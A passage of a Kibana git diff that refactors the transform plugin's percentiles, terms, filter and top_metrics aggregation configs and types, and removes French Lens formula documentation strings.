{isPivotAggsWithExtendedForm(aggConfigDef) && ( + {isPivotAggsWithExtendedForm(aggConfigDef) ? ( = ({ defaultData, otherAggNames, onCha aggConfig: update, }); }} + isValid={aggConfigDef.isValid()} /> - )} - {agg === PIVOT_SUPPORTED_AGGS.PERCENTILES && ( - - updatePercents(e.target.value)} - /> - - )} - {agg === PIVOT_SUPPORTED_AGGS.TERMS && ( - - updateSize(e.target.value)} /> - - )} + ) : null} {isUnsupportedAgg && ( = React.memo( ...(isPopulatedObject(runtimeMappings) && isLatestTransform(transformConfig) ? { runtimeFieldMap: runtimeMappings } : {}), + allowNoIndex: true, }, false, true diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts index 134e22b714bad..e99f06a2d0222 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/common.test.ts @@ -9,6 +9,7 @@ import { getPivotDropdownOptions } from '.'; import { DataView } from '@kbn/data-views-plugin/public'; import { FilterAggForm } from './filter_agg/components'; import type { RuntimeField } from '@kbn/data-views-plugin/common'; +import { PercentilesAggForm } from './percentiles_agg/percentiles_form_component'; describe('Transform: Define Pivot Common', () => { test('getPivotDropdownOptions()', () => { @@ -78,7 +79,8 @@ describe('Transform: Define Pivot Common', () => { field: ' the-f[i]e>ld ', aggName: 'the-field.percentiles', dropDownName: 'percentiles( the-f[i]e>ld )', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'filter( the-f[i]e>ld )': { agg: 'filter', @@ -182,7 +184,8 @@ describe('Transform: Define Pivot Common', () => { aggName: 'the-field.percentiles', dropDownName: 'percentiles( the-f[i]e>ld )', field: ' the-f[i]e>ld ', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'sum( the-f[i]e>ld )': { agg: 'sum', @@ -233,7 +236,8 @@ describe('Transform: Define Pivot Common', () => { aggName: 'rt_bytes_bigger.percentiles', dropDownName: 'percentiles(rt_bytes_bigger)', field: 'rt_bytes_bigger', - percents: [1, 5, 25, 50, 75, 95, 99], + AggFormComponent: PercentilesAggForm, + aggConfig: { percents: '1,5,25,50,75,95,99' }, }, 'sum(rt_bytes_bigger)': { agg: 'sum', diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts index b9d9e22072094..4003f9f88d40d 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/config.ts @@ -7,7 +7,7 @@ import { jsonStringValidator } from '../../../../../../common/validators'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, PivotAggsConfigBase, PivotAggsConfigWithUiBase, } from '../../../../../../common/pivot_aggs'; @@ -29,7 +29,7 @@ import { export function getFilterAggConfig( commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase ): PivotAggsConfigFilter { - const field = isPivotAggsConfigWithUiSupport(commonConfig) ? commonConfig.field : null; + const field = isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : null; return { ...commonConfig, @@ -50,6 +50,7 @@ export function getFilterAggConfig( }, setUiConfigFromEs(esAggDefinition) { const filterAgg = Object.keys(esAggDefinition)[0] as FilterAggType; + // @ts-ignore conflicts with a union type const filterAggConfig = esAggDefinition[filterAgg]; const aggTypeConfig = getFilterAggTypeConfig(filterAgg, field as string, filterAggConfig); diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts index d716710bcbb29..d71c2699faee8 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/filter_agg/types.ts @@ -40,11 +40,11 @@ interface FilterAggTypeConfig { } /** Filter agg type definition */ -interface FilterAggProps { +interface FilterAggProps { /** Filter aggregation type */ filterAgg: K; /** Definition of the filter agg config */ - aggTypeConfig: FilterAggTypeConfig; + aggTypeConfig: FilterAggTypeConfig; } /** Filter term agg */ @@ -62,10 +62,14 @@ export type FilterAggConfigRange = FilterAggProps< /** Filter exists agg */ export type FilterAggConfigExists = FilterAggProps<'exists', undefined, { field: string }>; /** Filter bool agg */ -export type FilterAggConfigBool = FilterAggProps<'bool', string>; +export type FilterAggConfigBool = FilterAggProps< + 'bool', + string, + { must?: object[]; must_not?: object[]; should?: object[] } +>; /** General type for filter agg */ -export type FilterAggConfigEditor = FilterAggProps; +export type FilterAggConfigEditor = FilterAggProps>; export type FilterAggConfigUnion = | FilterAggConfigTerm @@ -78,7 +82,7 @@ export type FilterAggConfigUnion = * TODO find out if it's possible to use {@link FilterAggConfigUnion} instead of {@link FilterAggConfigBase}. * ATM TS is not able to infer a type. */ -export type PivotAggsConfigFilter = PivotAggsConfigWithExtra; +export type PivotAggsConfigFilter = PivotAggsConfigWithExtra; export interface FilterAggConfigBase { filterAgg?: FilterAggType; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts index 5d8d7cb967b65..cfafd2ddb9f4b 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_agg_form_config.ts @@ -5,6 +5,8 @@ * 2.0. */ +import { getTermsAggConfig } from './terms_agg'; +import { getPercentilesAggConfig } from './percentiles_agg'; import { PivotSupportedAggs, PIVOT_SUPPORTED_AGGS, @@ -12,7 +14,7 @@ import { import { PivotAggsConfigBase, PivotAggsConfigWithUiBase } from '../../../../../common/pivot_aggs'; import { getFilterAggConfig } from './filter_agg/config'; -import { getTopMetricsAggConfig } from './top_metrics_agg/config'; +import { getTopMetricsAggConfig } from './top_metrics_agg'; /** * Gets form configuration for provided aggregation type. @@ -26,6 +28,10 @@ export function getAggFormConfig( return getFilterAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.TOP_METRICS: return getTopMetricsAggConfig(commonConfig); + case PIVOT_SUPPORTED_AGGS.PERCENTILES: + return getPercentilesAggConfig(commonConfig); + case PIVOT_SUPPORTED_AGGS.TERMS: + return getTermsAggConfig(commonConfig); default: return commonConfig; } diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts index 6667388fd3688..39712d41d9c75 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/get_default_aggregation_config.ts @@ -5,17 +5,16 @@ * 2.0. */ +import { getTermsAggConfig } from './terms_agg'; import { EsFieldName } from '../../../../../../../common/types/fields'; import { PivotSupportedAggs, PIVOT_SUPPORTED_AGGS, } from '../../../../../../../common/types/pivot_aggs'; -import { - PERCENTILES_AGG_DEFAULT_PERCENTS, - PivotAggsConfigWithUiSupport, -} from '../../../../../common'; +import { PivotAggsConfigWithUiSupport } from '../../../../../common'; import { getFilterAggConfig } from './filter_agg/config'; -import { getTopMetricsAggConfig } from './top_metrics_agg/config'; +import { getPercentilesAggConfig } from './percentiles_agg'; +import { getTopMetricsAggConfig } from './top_metrics_agg'; /** * Provides a configuration based on the aggregation type. @@ -35,11 +34,7 @@ export function getDefaultAggregationConfig( switch (agg) { case PIVOT_SUPPORTED_AGGS.PERCENTILES: - return { - ...commonConfig, - agg, - percents: PERCENTILES_AGG_DEFAULT_PERCENTS, - }; + return getPercentilesAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.FILTER: return getFilterAggConfig(commonConfig); case PIVOT_SUPPORTED_AGGS.TOP_METRICS: @@ -48,6 +43,8 @@ export function getDefaultAggregationConfig( // top_metrics agg has different naming convention by default aggName: PIVOT_SUPPORTED_AGGS.TOP_METRICS, }); + case PIVOT_SUPPORTED_AGGS.TERMS: + return getTermsAggConfig(commonConfig); default: return commonConfig; } diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts new file mode 100644 index 0000000000000..1957cedf7718e --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/config.ts @@ -0,0 +1,83 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PercentilesAggForm } from './percentiles_form_component'; +import { IPivotAggsConfigPercentiles } from './types'; +import { + isPivotAggsConfigWithUiBase, + PERCENTILES_AGG_DEFAULT_PERCENTS, + PivotAggsConfigBase, +} from '../../../../../../common'; +import { PivotAggsConfigWithUiBase } from '../../../../../../common/pivot_aggs'; + +/** + * TODO this callback has been moved. + * The logic of parsing the string should be improved. + */ +function parsePercentsInput(inputValue: string | undefined) { + if (inputValue !== undefined) { + const strVals: string[] = inputValue.split(','); + const percents: number[] = []; + for (const str of strVals) { + if (str.trim().length > 0 && isNaN(str as any) === false) { + const val = Number(str); + if (val >= 0 && val <= 100) { + percents.push(val); + } else { + return []; + } + } + } + + return percents; + } + + return []; +} + +// Input string should only include comma separated numbers +function isValidPercentsInput(inputValue: string) { + return /^[0-9]+(,[0-9]+)*$/.test(inputValue); +} + +export function getPercentilesAggConfig( + commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase +): IPivotAggsConfigPercentiles { + const field = isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : null; + + return { + ...commonConfig, + isSubAggsSupported: false, + isMultiField: false, + AggFormComponent: PercentilesAggForm, + field, + aggConfig: { + percents: PERCENTILES_AGG_DEFAULT_PERCENTS.toString(), + }, + setUiConfigFromEs(esAggDefinition) { + const { field: esField, percents } = esAggDefinition; + + this.field = esField; + this.aggConfig.percents = percents.join(','); + }, + getEsAggConfig() { + if (!this.isValid()) { + return null; + } + + return { + field: this.field as string, + percents: parsePercentsInput(this.aggConfig.percents), + }; + }, + isValid() { + return ( + typeof this.aggConfig.percents === 'string' && isValidPercentsInput(this.aggConfig.percents) + ); + }, + }; +} diff --git a/x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts similarity index 65% rename from x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts rename to x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts index c31955e3ecec8..4b5615ab0a2f7 100644 --- a/x-pack/plugins/observability/common/rules/observability_rule_registry_settings.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/index.ts @@ -5,8 +5,4 @@ * 2.0. */ -import { observabilityFeatureId } from '..'; - -export const observabilityRuleRegistrySettings = { - name: observabilityFeatureId, -}; +export { getPercentilesAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx new file mode 100644 index 0000000000000..5e962be2e1a42 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/percentiles_form_component.tsx @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { i18n } from '@kbn/i18n'; +import { EuiFieldText, EuiFormRow } from '@elastic/eui'; +import { IPivotAggsConfigPercentiles } from './types'; + +export const PercentilesAggForm: IPivotAggsConfigPercentiles['AggFormComponent'] = ({ + aggConfig, + onChange, + isValid, +}) => { + return ( + <> + + { + onChange({ + percents: e.target.value, + }); + }} + /> + + + ); +}; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts new file mode 100644 index 0000000000000..e2e433ee4fbf1 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/percentiles_agg/types.ts @@ -0,0 +1,17 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PivotAggsConfigWithExtra } from '../../../../../../common/pivot_aggs'; + +export interface PercentilesAggConfig { + /** Comma separated list */ + percents: string; +} +export type IPivotAggsConfigPercentiles = PivotAggsConfigWithExtra< + PercentilesAggConfig, + { field: string; percents: number[] } +>; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts new file mode 100644 index 0000000000000..81222354e34c0 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/config.ts @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { TermsAggForm } from './terms_form_component'; +import { + isPivotAggsConfigWithUiBase, + PivotAggsConfigBase, + PivotAggsConfigWithUiBase, + TERMS_AGG_DEFAULT_SIZE, +} from '../../../../../../common/pivot_aggs'; +import { IPivotAggsConfigTerms } from './types'; + +export function getTermsAggConfig( + commonConfig: PivotAggsConfigWithUiBase | PivotAggsConfigBase +): IPivotAggsConfigTerms { + const field = isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : null; + + return { + ...commonConfig, + isSubAggsSupported: false, + isMultiField: false, + AggFormComponent: TermsAggForm, + field, + aggConfig: { + size: TERMS_AGG_DEFAULT_SIZE, + }, + setUiConfigFromEs(esAggDefinition) { + const { field: esField, size } = esAggDefinition; + + this.field = esField; + this.aggConfig.size = size; + }, + getEsAggConfig() { + if (!this.isValid()) { + return null; + } + + return { + field: this.field as string, + size: this.aggConfig.size as number, + }; + }, + isValid() { + return typeof this.aggConfig.size === 'number' && this.aggConfig.size > 0; + }, + }; +} diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts new file mode 100644 index 0000000000000..c3cabe3c32b26 --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/index.ts @@ -0,0 +1,8 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export { getTermsAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx new file mode 100644 index 0000000000000..b500bc7a7a60d --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/terms_form_component.tsx @@ -0,0 +1,42 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { i18n } from '@kbn/i18n'; +import { EuiFieldNumber, EuiFormRow } from '@elastic/eui'; +import { IPivotAggsConfigTerms } from './types'; + +export const TermsAggForm: IPivotAggsConfigTerms['AggFormComponent'] = ({ + aggConfig, + onChange, + isValid, +}) => { + return ( + <> + + { + onChange({ size: Number(e.target.value) }); + }} + /> + + + ); +}; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts new file mode 100644 index 0000000000000..f2d00ecd50bed --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/terms_agg/types.ts @@ -0,0 +1,16 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { PivotAggsConfigWithExtra } from '../../../../../../common/pivot_aggs'; + +export interface TermsAggConfig { + size: number; +} +export type IPivotAggsConfigTerms = PivotAggsConfigWithExtra< + TermsAggConfig, + { field: string; size: number } +>; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts index 49be7b299712b..a7e5261ebf86e 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/config.ts @@ -6,8 +6,10 @@ */ import { isPopulatedObject } from '@kbn/ml-is-populated-object'; + +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, isSpecialSortField, isValidSortDirection, isValidSortMode, @@ -28,7 +30,7 @@ export function getTopMetricsAggConfig( ...commonConfig, isSubAggsSupported: false, isMultiField: true, - field: isPivotAggsConfigWithUiSupport(commonConfig) ? commonConfig.field : '', + field: isPivotAggsConfigWithUiBase(commonConfig) ? commonConfig.field : '', AggFormComponent: TopMetricsAggForm, aggConfig: {}, getEsAggConfig() { @@ -56,26 +58,37 @@ export function getTopMetricsAggConfig( }, }; } else { - sort = { [sortField!]: sortSettings.order }; + sort = { [sortField!]: sortSettings.order as estypes.SortOrder }; } } return { - metrics: (Array.isArray(this.field) ? this.field : [this.field]).map((f) => ({ field: f })), - sort, + metrics: (Array.isArray(this.field) ? this.field : [this.field]).map((f) => ({ + field: f as string, + })), + sort: sort!, ...(unsupportedConfig ?? {}), }; }, setUiConfigFromEs(esAggDefinition) { const { metrics, sort, ...unsupportedConfig } = esAggDefinition; - this.field = (Array.isArray(metrics) ? metrics : [metrics]).map((v) => v.field); + this.field = (Array.isArray(metrics) ? metrics : [metrics]).map((v) => v!.field); if (isSpecialSortField(sort)) { this.aggConfig.sortField = sort; return; } + if (!sort) { + this.aggConfig = { + ...this.aggConfig, + ...(unsupportedConfig ?? {}), + }; + + return; + } + const sortField = Object.keys(sort)[0]; this.aggConfig.sortField = sortField; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts new file mode 100644 index 0000000000000..edad3879aac1f --- /dev/null +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/index.ts @@ -0,0 +1,8 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +export { getTopMetricsAggConfig } from './config'; diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts index a90ee5307a18e..3c7c92dc5e5fb 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/step_define/common/top_metrics_agg/types.ts @@ -5,6 +5,7 @@ * 2.0. */ +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import type { PivotAggsConfigWithExtra, SortDirection, @@ -18,7 +19,15 @@ export interface TopMetricsAggConfig { order?: SortDirection; mode?: SortMode; numericType?: SortNumericFieldType; + [unsupported: string]: unknown; }; } -export type PivotAggsConfigTopMetrics = PivotAggsConfigWithExtra; +export type PivotAggsConfigTopMetrics = PivotAggsConfigWithExtra< + TopMetricsAggConfig, + { + metrics?: estypes.AggregationsTopMetricsValue | estypes.AggregationsTopMetricsValue[]; + size?: estypes.integer; + sort?: estypes.SortCombinations; + } +>; diff --git a/x-pack/plugins/translations/translations/fr-FR.json b/x-pack/plugins/translations/translations/fr-FR.json index 60eb4ff1a6bc1..dd658cec1d44f 100644 --- a/x-pack/plugins/translations/translations/fr-FR.json +++ b/x-pack/plugins/translations/translations/fr-FR.json @@ -76,952 +76,21 @@ } }, "messages": { - "xpack.lens.formula.absFunction.markdown": "\nCalcule une valeur absolue. Une valeur négative est multipliée par -1, une valeur positive reste identique.\n\nExemple : calculer la distance moyenne par rapport au niveau de la mer \"abs(average(altitude))\"\n ", - "xpack.lens.formula.addFunction.markdown": "\nAjoute jusqu'à deux nombres.\nFonctionne également avec le symbole \"+\".\n\nExemple : calculer la somme de deux champs\n\n\"sum(price) + sum(tax)\"\n\nExemple : compenser le compte par une valeur statique\n\n\"add(count(), 5)\"\n ", - "xpack.lens.formula.cbrtFunction.markdown": "\nÉtablit la racine carrée de la valeur.\n\nExemple : calculer la longueur du côté à partir du volume\n`cbrt(last_value(volume))`\n ", - "xpack.lens.formula.ceilFunction.markdown": "\nArrondit le plafond de la valeur au chiffre supérieur.\n\nExemple : arrondir le prix au dollar supérieur\n`ceil(sum(price))`\n ", - "xpack.lens.formula.clampFunction.markdown": "\nÉtablit une limite minimale et maximale pour la valeur.\n\nExemple : s'assurer de repérer les valeurs aberrantes\n```\nclamp(\n average(bytes),\n percentile(bytes, percentile=5),\n percentile(bytes, percentile=95)\n)\n```\n", - "xpack.lens.formula.cubeFunction.markdown": "\nCalcule le cube d'un nombre.\n\nExemple : calculer le volume à partir de la longueur du côté\n`cube(last_value(length))`\n ", - "xpack.lens.formula.divideFunction.markdown": "\nDivise le premier nombre par le deuxième.\nFonctionne également avec le symbole \"/\".\n\nExemple : calculer la marge bénéficiaire\n\"sum(profit) / sum(revenue)\"\n\nExemple : \"divide(sum(bytes), 2)\"\n ", - "xpack.lens.formula.expFunction.markdown": "\nÉlève *e* à la puissance n.\n\nExemple : calculer la fonction exponentielle naturelle\n\n`exp(last_value(duration))`\n ", - "xpack.lens.formula.fixFunction.markdown": "\nPour les valeurs positives, part du bas. Pour les valeurs négatives, part du haut.\n\nExemple : arrondir à zéro\n\"fix(sum(profit))\"\n ", - "xpack.lens.formula.floorFunction.markdown": "\nArrondit à la valeur entière inférieure la plus proche.\n\nExemple : arrondir un prix au chiffre inférieur\n\"floor(sum(price))\"\n ", - "xpack.lens.formula.logFunction.markdown": "\nÉtablit un logarithme avec base optionnelle. La base naturelle *e* est utilisée par défaut.\n\nExemple : calculer le nombre de bits nécessaire au stockage de valeurs\n```\nlog(sum(bytes))\nlog(sum(bytes), 2)\n```\n ", - "xpack.lens.formula.modFunction.markdown": "\nÉtablit le reste après division de la fonction par un nombre.\n\nExemple : calculer les trois derniers chiffres d'une valeur\n\"mod(sum(price), 1000)\"\n ", - "xpack.lens.formula.multiplyFunction.markdown": "\nMultiplie deux nombres.\nFonctionne également avec le symbole \"*\".\n\nExemple : calculer le prix après application du taux d'imposition courant\n`sum(bytes) * last_value(tax_rate)`\n\nExemple : calculer le prix après application du taux d'imposition constant\n\"multiply(sum(price), 1.2)\"\n ", - "xpack.lens.formula.powFunction.markdown": "\nÉlève la valeur à une puissance spécifique. Le deuxième argument est obligatoire.\n\nExemple : calculer le volume en fonction de la longueur du côté\n\"pow(last_value(length), 3)\"\n ", - "xpack.lens.formula.roundFunction.markdown": "\nArrondit à un nombre donné de décimales, 0 étant la valeur par défaut.\n\nExemples : arrondir au centième\n```\nround(sum(bytes))\nround(sum(bytes), 2)\n```\n ", - "xpack.lens.formula.sqrtFunction.markdown": "\nÉtablit la racine carrée d'une valeur positive uniquement.\n\nExemple : calculer la longueur du côté en fonction de la surface\n`sqrt(last_value(area))`\n ", - "xpack.lens.formula.squareFunction.markdown": "\nÉlève la valeur à la puissance 2.\n\nExemple : calculer l’aire en fonction de la longueur du côté\n`square(last_value(length))`\n ", - "xpack.lens.formula.subtractFunction.markdown": "\nSoustrait le premier nombre du deuxième.\nFonctionne également avec le symbole \"-\".\n\nExemple : calculer la plage d'un champ\n\"subtract(max(bytes), min(bytes))\"\n ", - "xpack.lens.formulaDocumentation.filterRatioDescription.markdown": "### Rapport de filtre :\n\nUtilisez \"kql=''\" pour filtrer un ensemble de documents et le comparer à d'autres documents du même regroupement.\nPar exemple, pour consulter l'évolution du taux d'erreur au fil du temps :\n\n```\ncount(kql='response.status_code > 400') / count()\n```\n ", - "xpack.lens.formulaDocumentation.percentOfTotalDescription.markdown": "### Pourcentage du total\n\nLes formules peuvent calculer \"overall_sum\" pour tous les regroupements,\nce qui permet de convertir chaque regroupement en un pourcentage du total :\n\n```\nsum(products.base_price) / overall_sum(sum(products.base_price))\n```\n ", - "xpack.lens.formulaDocumentation.weekOverWeekDescription.markdown": "### Semaine après semaine :\n\nUtilisez \"shift='1w'\" pour obtenir la valeur de chaque regroupement\nde la semaine précédente. Le décalage ne doit pas être utilisé avec la fonction *Valeurs les plus élevées*.\n\n```\npercentile(system.network.in.bytes, percentile=99) /\npercentile(system.network.in.bytes, percentile=99, shift='1w')\n```\n ", - "xpack.lens.indexPattern.cardinality.documentation.markdown": "\nCalcule le nombre de valeurs uniques d'un champ donné. Fonctionne pour les nombres, les chaînes, les dates et les valeurs booléennes.\n\nExemple : calculer le nombre de produits différents :\n`unique_count(product.name)`\n\nExemple : calculer le nombre de produits différents du groupe \"clothes\" :\n\"unique_count(product.name, kql='product.group=clothes')\"\n ", - "xpack.lens.indexPattern.count.documentation.markdown": "\nCalcule le nombre de documents.\n\nExemple : calculer le nombre de documents :\n\"count()\"\n\nExemple : calculer le nombre de documents correspondant à un filtre spécifique :\n\"count(kql='price > 500')\"\n ", - "xpack.lens.indexPattern.counterRate.documentation.markdown": "\nCalcule le taux d'un compteur toujours croissant. Cette fonction renvoie uniquement des résultats utiles inhérents aux champs d'indicateurs de compteur qui contiennent une mesure quelconque à croissance régulière.\nSi la valeur diminue, elle est interprétée comme une mesure de réinitialisation de compteur. Pour obtenir des résultats plus précis, \"counter_rate\" doit être calculé d’après la valeur \"max\" du champ.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\nIl utilise l'intervalle en cours utilisé dans la formule.\n\nExemple : visualiser le taux d'octets reçus au fil du temps par un serveur Memcached :\n`counter_rate(max(memcached.stats.read.bytes))`\n ", - "xpack.lens.indexPattern.cumulativeSum.documentation.markdown": "\nCalcule la somme cumulée d'un indicateur au fil du temps, en ajoutant toutes les valeurs précédentes d'une série à chaque valeur. Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nExemple : visualiser les octets reçus cumulés au fil du temps :\n`cumulative_sum(sum(bytes))`\n ", - "xpack.lens.indexPattern.differences.documentation.markdown": "\nCalcule la différence par rapport à la dernière valeur d'un indicateur au fil du temps. Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\nLes données doivent être séquentielles pour les différences. Si vos données sont vides lorsque vous utilisez des différences, essayez d'augmenter l'intervalle de l'histogramme de dates.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nExemple : visualiser la modification des octets reçus au fil du temps :\n`differences(sum(bytes))`\n ", - "xpack.lens.indexPattern.lastValue.documentation.markdown": "\nRenvoie la valeur d'un champ du dernier document, triée par le champ d'heure par défaut de la vue de données.\n\nCette fonction permet de récupérer le dernier état d'une entité.\n\nExemple : obtenir le statut actuel du serveur A :\n`last_value(server.status, kql='server.name=\"A\"')`\n ", - "xpack.lens.indexPattern.metric.documentation.markdown": "\nRenvoie l'indicateur {metric} d'un champ. Cette fonction fonctionne uniquement pour les champs numériques.\n\nExemple : obtenir l'indicateur {metric} d'un prix :\n\"{metric}(price)\"\n\nExemple : obtenir l'indicateur {metric} d'un prix pour des commandes du Royaume-Uni :\n\"{metric}(price, kql='location:UK')\"\n ", - "xpack.lens.indexPattern.movingAverage.documentation.markdown": "\nCalcule la moyenne mobile d'un indicateur au fil du temps, en prenant la moyenne des n dernières valeurs pour calculer la valeur actuelle. Pour utiliser cette fonction, vous devez également configurer une dimension de l'histogramme de dates.\nLa valeur de fenêtre par défaut est {defaultValue}.\n\nCe calcul est réalisé séparément pour des séries distinctes définies par des filtres ou des dimensions de valeurs supérieures.\n\nPrend un paramètre nommé \"window\" qui spécifie le nombre de dernières valeurs à inclure dans le calcul de la moyenne de la valeur actuelle.\n\nExemple : lisser une ligne de mesures :\n`moving_average(sum(bytes), window=5)`\n ", - 